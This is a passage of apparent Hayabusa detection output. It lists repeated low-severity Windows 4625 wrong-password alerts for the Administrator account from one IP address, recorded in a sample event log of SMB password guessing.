NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: 
